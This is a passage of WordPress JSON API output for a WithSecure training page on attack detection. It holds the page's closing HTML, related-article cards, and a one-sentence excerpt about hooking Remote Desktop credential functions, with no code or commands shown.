rel=\"noopener\">final lab<\/a> of the Windows workshop, as we explore cookie theft using Rich Warren&#x27;s <a href=\"https:\/\/github.com\/rxwx\/chlonium\" target=\"_blank\" rel=\"noopener\">Chlonium<\/a> project!<\/p>\n<\/div>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-3\/&#038;title=Attack%20Detection%20Fundamentals%202021:%20Windows%20&#8211;%20Lab%20#3\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Share on Linkedin\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals 2021: Windows &#8211; Lab #3&#038;url=https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-3\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Share on Twitter\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                        <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-cta-banner edwp-block js-wp-block-cta-banner wp-block-cta-banner--style-icon wp-block-cta-banner--no-image layout--spacing-xxxl-top layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-cta-banner__container\">\n        <div class=\"wp-block-cta-banner__box row-load\">\n            <div class=\"wp-component-content wp-component-content--help-text wp-component-content--dark wp-block-cta-banner__content\">\n                        <div class=\"wp-component-content__inner\">\n                <h2 class=\"wp-component-heading text--h2 wp-component-heading--dark wp-component-content__title\">\n    What <span class=\"blue-text\">next?<\/span><\/h2>                                    <div class=\"wp-component-content__content wysiwyg wysiwyg--dark\">\n                        <div class=\"wp-component-paragraph wp-component-paragraph--dark\">\n    <p class=\"text--p-medium\">Discover WithSecure\u2122 Elements Exposure Management.<br \/>\n&#8211; No credit card required. No obligations.No complexity.<\/p>\n<\/div>\n                    <\/div>\n                            <\/div>\n                            <div class=\"wp-component-content__buttons\">\n                <a class=\"wp-component-button btn btn--primary btn--dark\" href=\"https:\/\/www.withsecure.com\/en\/contact-us\/\">Contact us<\/a>            <\/div>\n                <\/div>                    <\/div>\n    <\/div>\n<\/section>\n\n\n\n\n<section\n    class=\"wp-block-cards edwp-block wp-block-cards--col-3 js-wp-block-cards wp-block-cards--show-overflow wp-block-cards--auto-slides-per-view layout--spacing-xxxl-top layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-cards__container\">\n        <div class=\"wp-component-content wp-component-content--default wp-block-cards__content\">\n            <h2 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Related <span class=\"blue-text\">Labs content<\/span><\/h2>                    <div class=\"wp-component-content__inner\">\n                                    <div class=\"wp-component-content__content wysiwyg\">\n                        <div class=\"wp-component-paragraph \">\n    <p class=\"text--p-medium\"><span data-teams=\"true\">Find related content relating to this topic.<\/span><\/p>\n<\/div>\n                    <\/div>\n                                                            <\/div>\n                <\/div>                            <div\n                class=\"swiper wp-block-cards__swiper js-wp-block-cards-swiper\"\n                data-slides-per-view-desktop=\"auto\"\n                data-slides-per-view-tablet=\"auto\"\n                data-slides-per-view-mobile=\"auto\"\n            >\n                <div class=\"swiper-wrapper wp-block-cards__swiper-wrapper row-load\">\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">AI security<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">GREYVIBE: A Russia-nexus group leveraging AI across state-aligned operations<\/h3>\n                                    <p class=\"wp-component-card-insight__read-time\">15<\/p>\n                                    <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/greyvibe\/\">Read more<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                            <h3 class=\"wp-component-card-insight__title\">WithSecure uncovers Russia-nexus threat group using AI to target Ukraine and European organisations<\/h3>\n                                                    <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/10919\/\">Read more<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"800\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research.jpg.webp 1200w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-300x200.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-1024x683.jpg.webp 1024w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-768x512.jpg.webp 768w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-447x298.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-219x146.jpg.webp 219w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">DarkGate Rises: New version of DarkGate malware hunts like a Duck but bites like a RAT<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">Source: https:\/\/labs.withsecure.com\/publications\/darkgate-rises<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/darkgate-rises\/\">Read more<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                    <\/div>\n                <div class=\"wp-block-cards__nav fade-in\">\n                    <div class=\"wp-block-cards__pagination js-wp-block-cards-pagination\">\n                    <\/div>\n                    <div class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-prev\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                    <div class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-next\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                <\/div>\n            <\/div>\n                                    <\/div>\n<\/section>\n","protected":false},"excerpt":{"rendered":"<p>For this lab, we&#8217;ll turn the tables on the defensive use of API hooking and apply the same principles in an offensive post exploitation context. We&#8217;ll target a user authenticating to a host using Remote Desktop, and hook the functions that provide us with their plaintext credentials.<\/p>\n","protected":false},"author":3,"featured_media":8858,"template":"","categories":[240,231],"labs_content_type":[296],"class_list":["post-7751","lab_item","type-lab_item","status-publish","has-post-thumbnail","hentry","category-attack-detection","category-software-protection"],"acf":[],"card":"<div class=\"wp-component-card-insight js-card-link wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img width=\"1200\" height=\"800\" src=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research.jpg\" class=\"wp-component-card-insight__image\" alt=\"\" decoding=\"async\" loading=\"lazy\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research.jpg 1200w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research-300x200.jpg 300w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research-1024x683.jpg 1024w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research-768x512.jpg 768w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research-447x298.jpg 447w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research-219x146.jpg 219w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Attack Detection Fundamentals 2021: Windows &#8211; Lab #3<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">For this lab, we&#039;ll turn the tables on the defensive use of API hooking and apply the same principles in an offensive post exploitation context. We&#039;ll target a user authenticating to a host using Remote Desktop, and hook the functions that provide us with their plaintext credentials.<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-3\/\">Read more<\/a>            <\/div>\n            <\/div>\n<\/div>","_links":{"self":[{"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/lab_item\/7751","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/lab_item"}],"about":[{"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/types\/lab_item"}],"author":[{"embeddable":true,"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/users\/3"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/media\/8858"}],"wp:attachment":[{"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/media?parent=7751"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/categories?post=7751"},{"taxonomy":"labs_content_type","embeddable":true,"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/labs_content_type?post=7751"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}